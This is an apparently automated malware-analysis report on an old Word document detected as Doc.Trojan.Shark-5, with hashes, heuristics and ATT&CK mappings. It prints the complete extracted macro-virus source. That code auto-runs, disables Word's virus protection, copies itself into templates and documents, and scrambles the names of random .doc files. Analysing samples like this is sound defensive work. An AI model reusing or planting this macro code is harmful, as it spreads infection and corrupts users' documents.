Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b4f89543f6e07a5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 53.0 KB
Created: 1997-04-26 07:26:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a558a5bc2163852115c7243d89ebc60d
SHA-1: 0655bcf2fb24f0f23fb67aaf2bae92e9a69e1d2c
SHA-256: 6b4f89543f6e07a57e7aa6e3ab05d63f9956e1dcede27ffcb587aadb081ddb0d
Risk Score: 280

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This OLE document contains legacy WordBasic macros, including AutoOpen, AutoClose, and AutoExec, which are indicative of older malware families. The script explicitly attempts to disable virus protection and copy itself to other documents, suggesting a self-propagating or infection mechanism. The ClamAV detection 'Doc.Trojan.Shark-5' further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Trojan.Shark-5 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Shark-5
  • OLE document has large unaccounted-for region (severity: high, id: OLE_SLACK_ANOMALY)
    OLE file is 54,272 bytes but its declared streams total only 30,798 bytes — 23,474 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected (severity: medium, 2 related findings, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high, id: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3538 bytes
SHA-256: 7eb17cf49c9f57801cb73255202a09bbedfc020b9ba1422d33e1766969071937
Detection: ClamAV: Doc.Trojan.Shark-5
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Switch"
'                  >>> Switch - An Israeli Virus <<<
'                             Written by
'                        " The Israeli Shark "
'                         All Rights Reserved
'                               1999(C)

Public TemplateName As String
Public DocName As String

Sub AutoOpen()
    Call First
End Sub

Sub AutoNew()
  Call First
End Sub

Sub AutoClose()
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.MainModule.AutoClose"
   Call First
End Sub

Sub AutoExec()
  Call First
End Sub

Sub AutoExit()
    Call First
End Sub

Sub FileSave()
On Error GoTo NextStep
    Documents.Application.ActiveDocument.Save
NextStep:
    Call First
End Sub


Private Sub First()
   
    On Error GoTo NextStep
    
    'Removes Any Detection Options
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    CommandBars.Item("macro").Enabled = False
    CommandBars.Item("Visual Basic").Enabled = False
   
    Dim varTemplate As Template
   
    DocName = Application.ActiveDocument.FullName
  
    For Each varTemplate In Templates
        TemplateName = varTemplate.FullName
        Application.OrganizerCopy DocName, TemplateName, "Switch", wdOrganizerObjectProjectItems
        varTemplate.Save
    Next varTemplate
       
NextStep:

    Call Second

End Sub
Private Sub Second()
     
    On Error GoTo NextStep
    
     Application.OrganizerCopy TemplateName, DocName, "Switch", wdOrganizerObjectProjectItems
     
NextStep:
  
    Call Third

End Sub

Private Sub Third()
   
    On Error GoTo EndOfProcess
    
    Dim PathString As String
    Dim strFileName(1 To 2) As String
    Dim TempFileName As String
    Dim FilesNum As Integer
    Dim Index As Integer
    Dim Index2 As Integer
    Dim Temp As Integer
     
    PathString = Dir("C:\Protect.sys"): If Len(PathString) Then End
       
    PathString = ActiveDocument.Path
        
    If Right(PathString, 1) <> "\" Then PathString = PathString + "\"
    
    strFileName(1) = Dir(PathString + "Switch.doc")
    If Len(strFileName(1)) Then
        Kill "Switch.doc"
    End If
    
    strFileName(1) = Dir(PathString + "*.DOC")
    
    Do While Len(strFileName(1))
        FilesNum = FilesNum + 1
        strFileName(1) = Dir
    Loop
     
    FilesNum = FilesNum - 1
    strFileName(1) = ""
    strFileName(2) = ""
     
    strFileName(1) = Dir(PathString + "*.Doc")
    
    For Index = 1 To 2
        Randomize (Timer)
        Temp = Int(Rnd(1) * (FilesNum - 1)) + 1
        For Index2 = 1 To Temp
            strFileName(Index) = Dir
        Next Index2
        FilesNum = FilesNum - (Temp - 1)
    Next Index
    
    Open PathString + strFileName(1) For Binary Access Read Lock Read As #1: Input #1, TempLine: Close #1
    Open PathString + strFileName(2) For Binary Access Read Lock Read As #1: Input #1, TempLine: Close #1
    
    Name PathString + strFileName(1) As PathString + "Switch.doc"
    Name PathString + strFileName(2) As PathString + strFileName(1)
    Name PathString + "Switch.doc" As PathString + strFileName(2)

    End

EndOfProcess:

    End

End Sub